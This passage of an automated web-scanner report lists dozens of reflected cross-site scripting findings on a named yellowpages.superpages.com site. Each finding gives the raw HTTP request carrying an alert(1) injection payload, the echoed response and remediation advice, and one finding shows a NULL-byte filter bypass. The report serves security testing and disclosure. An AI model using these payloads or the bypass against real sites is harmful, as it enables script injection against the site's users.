GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 03 Feb 2011 17:10:53 GMT Connection: close
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57369 Date: Thu, 03 Feb 2011 17:10:47 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/listings.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56970 Date: Thu, 03 Feb 2011 17:10:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ges.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56887 Date: Thu, 03 Feb 2011 17:10:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... om'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/profile.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 32667 Date: Thu, 03 Feb 2011 17:10:08 GMT Connection: close
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64285 Date: Thu, 03 Feb 2011 17:11:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... m'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64190 Date: Thu, 03 Feb 2011 17:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
